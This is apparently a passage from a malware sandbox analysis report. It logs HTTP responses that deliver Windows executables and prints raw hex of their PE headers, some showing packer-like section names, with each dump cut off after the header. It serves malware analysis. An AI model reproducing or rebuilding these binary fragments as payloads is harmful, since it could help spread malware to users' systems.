00 00 70 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 36 44 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 
10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 63 6f 72 7a 68 61 6f 00 a0 19 00 00 c0 4f 00 00 9e 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6b 78 66 65 61 63 64 00 10 00 00 00 60 69 00 00 06 00 00 00 da 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 e0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 24 Sep 2024 13:34:30 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 24 Sep 2024 13:27:18 GMT ETag: "e1000-622dd76ee470c" Accept-Ranges: bytes Content-Length: 921600 Content-Type: application/x-msdos-program
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 24 Sep 2024 13:34:40 GMT Content-Type: application/octet-stream Content-Length: 1873408 Last-Modified: Tue, 24 Sep 2024 13:28:16 GMT Connection: keep-alive ETag: "66f2be70-1c9600" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 24 Sep 2024 13:35:03 GMT Content-Type: application/octet-stream Content-Length: 320000 Last-Modified: Wed, 11 Sep 2024 19:08:04 GMT Connection: keep-alive ETag: "66e1ea94-4e200" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 24 Sep 2024 13:36:04 GMT Content-Type: application/octet-stream Content-Length: 192000 Last-Modified: Sat, 24 Aug 2024 14:58:01 GMT Connection: keep-alive ETag: "66c9f4f9-2ee00" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 24 Sep 2024 13:36:18 GMT Content-Type: application/octet-stream Content-Length: 4278784 Last-Modified: Thu, 12 Sep 2024 13:56:06 GMT Connection: keep-alive ETag: "66e2f2f6-414a00" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 24 Sep 2024 13:36:54 GMT Content-Type: application/octet-stream Content-Length: 506368 Last-Modified: Tue, 10 Sep 2024 19:10:31 GMT Connection: keep-alive ETag: "66e099a7-7ba00" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 24 Sep 2024 13:37:02 GMT Content-Type: application/octet-stream Content-Length: 464896 Last-Modified: Sat, 07 Sep 2024 22:52:49 GMT Connection: keep-alive ETag: "66dcd941-71800" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 24 Sep 2024 13:37:05 GMT Content-Type: application/octet-stream Content-Length: 689664 Last-Modified: Mon, 05 Aug 2024 00:09:39 GMT Connection: keep-alive ETag: "66b01843-a8600" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 24 Sep 2024 13:37:08 GMT Content-Type: application/octet-stream Content-Length: 1381143 Last-Modified: Fri, 13 Sep 2024 12:59:12 GMT Connection: keep-alive ETag: "66e43720-151317" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:12 GMTContent-Type: application/octet-streamContent-Length: 321536Last-Modified: Mon, 16 Sep 2024 13:46:13 GMTConnection: keep-aliveETag: "66e836a5-4e800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f2 26 e8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 0a 00 00 00 00 00 00 0e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 fa 04 00 57 00 00 00 00 00 05 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 7c f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 db 04 00 00 20 00 00 00 dc 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 08 06 00 00 00 00 05 00 00 08 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 fa 04 00 00 00 00 00 48 00 00 00 02 00 05 00 98 e9 04 00 e4 0f 00 00 03 00 02 00 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 c9 11 68 37 03 ef c9 ea 63 37 33 eb 0c 77 88 e8 56 29 4a 2e 3a 18 a0 61 ed 57 27 e2 3d e6 7c a4 94 a0 51 26 fe a7 b0 05 a7 70 e5 eb e9 0e 49 49 6f 4f 9a 0c e2 67 c5 f5 c5 96 51 c2 fb 08 50 b7 7e 43 4d 16 02 1d 76 40 8e 50 2a e4 ea 53 6c 93 7f 83 1b 61 3d 08 cb 3a 75 3f 45 44 bd 22 a1 f8 4a 70 d6 d5 f1 8a 8f c5 32 a7 96 72 1c 42 c6 a3 ea 48 be cc 98 82 3f b7 76 87 a7 30 5d 32 ae c1 1f e9 8c e5 3e f4 c3 46 cc 7d c9 73 36 0b 98 4e 0e 2e cf 88 68 f7 23 19 a5 c6 02 ab 5a 93 36 97 d9 67 5e 67 75 da 61 57 26 d1 8a 32 95 6e 3f ad 76 97 d9 b0 2a e0 53 88 cb 14 7d 85 21 d4 5e 14 a1 45 cc 68 aa 64 70 c0 d3 c5 a5 14 bf 66 63 34 7b d7 b5 d3 2f 4f aa ac 49 bd f5 84 b9 76 e1 51 2c 55 d4 d4 e2 3e 78 4b b6 ac 63 f5 44 ca 85 1b e6 2f 0e d4 45 37 2e 00 ae 54 1c e3 ad a6 f4 74 84 1a b1 d1 a8 90 b8 79 c2 cc c6 b6 66 87 82 53 43 e2 d6 18 de 29 fa 46 b3 6d cc 22 32 18 c4 a7 ea 4d 73 fb 33 22 4b 4c af 65 89 8c 7a 63 db 42 62 c3 2d 05 6c c3 5c 17 9e fe 01 d
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:37:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 24 Sep 2024 12:56:26 GMTETag: "1c0200-622dd088a9fca"Accept-Ranges: bytesContent-Length: 1835520Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 70 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 36 44 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 
10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 63 6f 72 7a 68 61 6f 00 a0 19 00 00 c0 4f 00 00 9e 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6b 78 66 65 61 63 64 00 10 00 00 00 60 69 00 00 06 00 00 00 da 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 e0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:18 GMTContent-Type: application/octet-streamContent-Length: 360448Last-Modified: Mon, 23 Sep 2024 14:42:37 GMTConnection: keep-aliveETag: "66f17e5d-58000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 3c 94 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 aa 04 00 00 d2 00 00 00 00 00 00 c0 d3 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8a e5 04 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 d0 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac e6 04 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dd a8 04 00 00 10 00 00 00 aa 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b1 29 00 00 00 c0 04 00 00 2a 00 00 00 ae 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 f0 00 00 00 f0 04 00 00 5e 00 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d0 48 00 00 00 f0 05 00 00 4a 00 00 00 36 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 24 Sep 2024 13:37:22 GMTContent-Type: application/octet-streamContent-Length: 10796768Last-Modified: Fri, 20 Sep 2024 14:29:18 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ed86be-a4bee0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 5d 95 67 ab 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 f2 4e 00 00 f0 54 00 00 00 00 00 7e 10 4f 00 00 20 00 00 00 20 4f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 a4 00 00 04 00 00 65 29 a5 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 30 10 4f 00 4b 00 00 00 00 40 4f 00 56 e2 54 00 00 00 00 00 00 00 00 00 00 f0 a3 00 e0 d8 00 00 00 40 a4 00 0c 00 00 00 eb 0f 4f 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 f0 4e 00 00 20 00 00 00 f2 4e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 a4 08 00 00 00 20 4f 00 00 0a 00 00 00 f6 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 56 e2 54 00 00 40 4f 00 00 e4 54 00 00 00 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 a4 00 00 02 00 00 00 e4 a3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Sep 2024 13:37:34 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 23 Sep 2024 15:59:37 GMTETag: "65ec4b-622cb79d4984d"Accept-Ranges: bytesContent-Length: 6679627Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d5 30 f1 66 00 4c 5f 00 d4 26 00 00 e0 00 06 01 0b 01 02 23 00 e6 47 00 00 9e 5a 00 00 e2 66 00 b0 14 00 00 00 10 00 00 00 00 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 c6 00 00 06 00 00 87 ce 66 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 80 b3 00 42 00 00 00 00 90 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b3 00 d4 29 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 ad 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 91 b3 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 e4 47 00 00 10 00 00 00 e6 47 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 a8 15 00 00 00 00 48 00 00 16 00 00 00 ec 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 18 9f 00 00 00 20 48 00 00 a0 00 00 00 02 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2f 34 00 00 00 00 00 00 c8 c7 03 00 00 c0 48 00 00 c8 03 00 00 a2 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 b4 e1 66 00 00 90 4c 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 42 00 00 00 00 80 b3 00 00 02 00 00 00 6a 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 e4 09 00 00 00 90 b3 00 00 0a 00 00 00 6c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 34 00 00 00 00 a0 b3 00 00 02 00 00 00 76 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 b0 b3 00 00 02 00 00 00 78 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 d4 29 0e 00 00 c0 b3 00 00 2a 0e 00 00 7a 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 34 00 00 00 00 00 90 06 00 00 00 f0 c1 00 00 08 00 00 00 a4 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 32 39 00 00 00 00 00 c4 a7 01 00 00 00 c2 00 00 a8 01 00 00 ac 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 31 00 00 00 00 00 58 4c 00 00 00 b0 c3 00 00 4e 00 00 00 54 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 35 00 00 00 00 00 42 e3
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 24 Sep 2024 13:37:43 GMTContent-Type: application/octet-streamContent-Length: 311296Last-Modified: Sun, 22 Sep 2024 20:59:29 GMTConnection: keep-aliveETag: "66f08531-4c000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 80 b6 e6 ea 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 d6 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 68 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc e9 02 00 00 20 00 00 00 ec 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 c9 01 00 00 20 03 00 00 cc 01 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 04 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
